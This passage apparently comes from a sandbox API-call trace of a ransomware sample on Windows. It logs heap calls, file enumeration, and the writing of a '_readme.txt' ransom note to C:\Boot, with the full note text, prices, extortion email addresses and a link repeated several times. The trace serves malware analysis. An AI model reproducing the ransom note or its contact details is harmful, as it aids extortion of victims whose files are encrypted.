out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3247810 | out: hHeap=0x660000) returned 1 [0056.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.073] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e9eeef0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1e9eeef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1e9eeef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.073] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e9eeef0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1e9eeef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1e9eeef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.073] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0056.073] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.073] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.074] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.075] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.077] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.078] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.078] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.078] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.078] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.078] PathFindFileNameW (pszPath="") returned="" [0056.078] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.078] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.078] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.078] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.078] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.078] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.078] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0056.078] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.078] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.078] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0056.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.079] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.079] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.079] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact 